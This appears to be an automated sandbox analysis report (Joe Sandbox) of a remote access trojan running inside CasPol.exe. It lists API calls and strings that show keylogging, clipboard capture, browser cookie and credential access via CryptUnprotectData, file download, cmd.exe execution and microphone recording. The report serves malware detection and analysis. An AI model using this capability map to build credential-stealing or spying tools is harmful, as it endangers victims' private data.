                            • User Data\Default\Network\Cookies, xrefs: 0040C603
                            • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                            Similarity
                            • API ID: ExistsFilePath
                            • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                            • API String ID: 1174141254-1980882731
                            APIs
                              • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                            • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                            • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757
                            Strings
                            • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                            • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                            Similarity
                            • API ID: ExistsFilePath
                            • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                            • API String ID: 1174141254-1980882731
                            APIs
                            • CreateThread.KERNEL32(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
                            • CreateThread.KERNEL32(00000000,00000000,0040A267,?,00000000,00000000), ref: 0040A20E
                            • CreateThread.KERNEL32(00000000,00000000,0040A289,?,00000000,00000000), ref: 0040A21A
                              • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                              • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                            Similarity
                            • API ID: CreateThread$LocalTimewsprintf
                            • String ID: Offline Keylogger Started
                            • API String ID: 465354869-4114347211
                            APIs
                              • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                              • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                              • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                            • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AF6E
                            • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AF7A
                            • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                            Similarity
                            • API ID: CreateThread$LocalTime$wsprintf
                            • String ID: Online Keylogger Started
                            • API String ID: 112202259-1258561607
                            APIs
                            • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
                            • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: CryptUnprotectData$crypt32
                            • API String ID: 2574300362-2380590389
                            APIs
                            • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                            • CloseHandle.KERNEL32(?), ref: 004051CA
                            • SetEvent.KERNEL32(?), ref: 004051D9
                            Similarity
                            • API ID: CloseEventHandleObjectSingleWait
                            • String ID: Connection Timeout
                            • API String ID: 2055531096-499159329
                            APIs
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                            Similarity
                            • API ID: Exception@8Throw
                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                            • API String ID: 2005118841-1866435925
                            APIs
                            • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041381F
                            • RegSetValueExW.ADVAPI32(004752D8,?,00000000,00000001,00000000,00000000,004752F0,?,0040F823,pth_unenc,004752D8), ref: 0041384D
                            • RegCloseKey.ADVAPI32(004752D8,?,0040F823,pth_unenc,004752D8), ref: 00413858
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID: pth_unenc
                            • API String ID: 1818849710-4028850238
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                              • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                              • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                            Similarity
                            • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                            • String ID: bad locale name
                            • API String ID: 3628047217-1405518554
                            APIs
                            • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                            • ShowWindow.USER32(00000009), ref: 00416C61
                            • SetForegroundWindow.USER32 ref: 00416C6D
                              • Part of subcall function 0041CD9B: AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                              • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                              • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                            Similarity
                            • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                            • String ID: !D@
                            • API String ID: 3446828153-604454484
                            APIs
                            • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                            Similarity
                            • API ID: ExecuteShell
                            • String ID: /C $cmd.exe$open
                            • API String ID: 587946157-3896048727
                            APIs
                            • TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                            • UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                            • TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B8D5
                            Similarity
                            • API ID: TerminateThread$HookUnhookWindows
                            • String ID: pth_unenc
                            • API String ID: 3123878439-4028850238
                            APIs
                            • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                            • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: GetCursorInfo$User32.dll
                            • API String ID: 1646373207-2714051624
                            • Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                            • Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
                            • Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                            • Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E
                            APIs
                            • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                            • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: GetLastInputInfo$User32.dll
                            • API String ID: 2574300362-1519888992
                            • Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                            • Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
                            • Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                            • Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: __alldvrm$_strrchr
                            • String ID:
                            • API String ID: 1036877536-0
                            • Opcode ID: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                            • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                            • Opcode Fuzzy Hash: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                            • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                            • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                            • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                            • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                            APIs
                            Strings
                            • Cleared browsers logins and cookies., xrefs: 0040C0F5
                            • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep
                            • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                            • API String ID: 3472027048-1236744412
                            • Opcode ID: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
                            • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                            • Opcode Fuzzy Hash: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
                            • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                            APIs
                              • Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
                              • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
                              • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594
                            • Sleep.KERNEL32(000001F4), ref: 0040A573
                            • Sleep.KERNEL32(00000064), ref: 0040A5FD
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$SleepText$ForegroundLength
                            • String ID: [ $ ]
                            • API String ID: 3309952895-93608704
                            • Opcode ID: e4ff9062ebc1855ffc8709a41a4aeb88848ac43e96cbaf8abbe5df7ed01e55c0
                            • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                            • Opcode Fuzzy Hash: e4ff9062ebc1855ffc8709a41a4aeb88848ac43e96cbaf8abbe5df7ed01e55c0
                            • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e504ac4fddb0f8a25c6be19684a152be264dadb57d82260706401bb5bc5fb7a8
                            • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
                            • Opcode Fuzzy Hash: e504ac4fddb0f8a25c6be19684a152be264dadb57d82260706401bb5bc5fb7a8
                            • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 253450334f16ac4bada5e464aed069c53fdbe8794578123440a1a1ba72333804
                            • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
                            • Opcode Fuzzy Hash: 253450334f16ac4bada5e464aed069c53fdbe8794578123440a1a1ba72333804
                            • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
                            APIs
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                            • GetLastError.KERNEL32(?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: LibraryLoad$ErrorLast
                            • String ID:
                            • API String ID: 3177248105-0
                            • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                            • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                            • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                            • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
                            APIs
                            • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C4B2
                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C4D7
                            • CloseHandle.KERNEL32(00000000), ref: 0041C4E5
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleReadSize
                            • String ID:
                            • API String ID: 3919263394-0
                            • Opcode ID: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
                            • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
                            • Opcode Fuzzy Hash: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
                            • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                            APIs
                            • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                            • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                            • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
                            • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandleOpenProcess
                            • String ID:
                            • API String ID: 39102293-0
                            • Opcode ID: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                            • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                            • Opcode Fuzzy Hash: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                            • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                            APIs
                            • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                              • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                            • _UnwindNestedFrames.LIBCMT ref: 00439891
                            • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                            • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                            • String ID:
                            • API String ID: 2633735394-0
                            • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                            • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
                            • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                            • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
                            APIs
                            • GetSystemMetrics.USER32(0000004C), ref: 004193F0
                            • GetSystemMetrics.USER32(0000004D), ref: 004193F6
                            • GetSystemMetrics.USER32(0000004E), ref: 004193FC
                            • GetSystemMetrics.USER32(0000004F), ref: 00419402
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: MetricsSystem
                            • String ID:
                            • API String ID: 4116985748-0
                            • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                            • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
                            • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                            • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
                            APIs
                            • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                            • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                            • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                              • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                            • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                            • String ID:
                            • API String ID: 1761009282-0
                            • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                            • Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
                            • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                            • Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
                            APIs
                            • __startOneArgErrorHandling.LIBCMT ref: 00442CED
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorHandling__start
                            • String ID: pow
                            • API String ID: 3213639722-2276729525
                            • Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                            • Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
                            • Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                            • Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F
                            APIs
                              • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                            • __Init_thread_footer.LIBCMT ref: 0040B797
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Init_thread_footer__onexit
                            • String ID: [End of clipboard]$[Text copied to clipboard]
                            • API String ID: 1881088180-3686566968
                            • Opcode ID: 1452d6304ce3f0295fff478f129f85fb29fa27eb4ce50424bc2e0dcad400a5b7
                            • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                            • Opcode Fuzzy Hash: 1452d6304ce3f0295fff478f129f85fb29fa27eb4ce50424bc2e0dcad400a5b7
                            • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                            APIs
                            • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ACP$OCP
                            • API String ID: 0-711371036
                            • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                            • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
                            • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                            • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
                            APIs
                            • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                              • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                            • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                            Strings
                            • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: LocalTime
                            • String ID: KeepAlive | Enabled | Timeout:
                            • API String ID: 481472006-1507639952
                            • Opcode ID: 94476530adddf729a94900e8ced82c90480f790f78fd79a0466f5c5f7008df8a
                            • Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
                            • Opcode Fuzzy Hash: 94476530adddf729a94900e8ced82c90480f790f78fd79a0466f5c5f7008df8a
                            • Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF
                            APIs
                            • Sleep.KERNEL32 ref: 00416640
                            • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: DownloadFileSleep
                            • String ID: !D@
                            • API String ID: 1931167962-604454484
                            • Opcode ID: 07a7ba679a22719b007f27f942da87136b12813d5d7402b4186b0f1ae2008f5d
                            • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                            • Opcode Fuzzy Hash: 07a7ba679a22719b007f27f942da87136b12813d5d7402b4186b0f1ae2008f5d
                            • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                            APIs
                            • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: LocalTime
                            • String ID: | $%02i:%02i:%02i:%03i
                            • API String ID: 481472006-2430845779
                            • Opcode ID: 0b58fb712609a629be2860926311a3a1d9782cd388fbf364b696734300abae58
                            • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                            • Opcode Fuzzy Hash: 0b58fb712609a629be2860926311a3a1d9782cd388fbf364b696734300abae58
                            • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                            APIs
                            • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExistsFilePath
                            • String ID: alarm.wav$hYG
                            • API String ID: 1174141254-2782910960
                            • Opcode ID: 0e1c4e1224622d2e2eba9349cd815abebc3d2b7a1c969d03ea25083f5c27e476
                            • Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
                            • Opcode Fuzzy Hash: 0e1c4e1224622d2e2eba9349cd815abebc3d2b7a1c969d03ea25083f5c27e476
                            • Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F
                            APIs
                              • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                              • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                              • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                            • CloseHandle.KERNEL32(?), ref: 0040B0B4
                            • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                            • String ID: Online Keylogger Stopped
                            • API String ID: 1623830855-1496645233
                            • Opcode ID: 14d91ba3cc0780b58bc46c93ea61c46197eef5bd77683ed78bbf46c7536d2da3
                            • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                            • Opcode Fuzzy Hash: 14d91ba3cc0780b58bc46c93ea61c46197eef5bd77683ed78bbf46c7536d2da3
                            • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                            APIs
                            • waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                            • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: wave$BufferHeaderPrepare
                            • String ID: XMG
                            • API String ID: 2315374483-813777761
                            • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                            • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                            • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
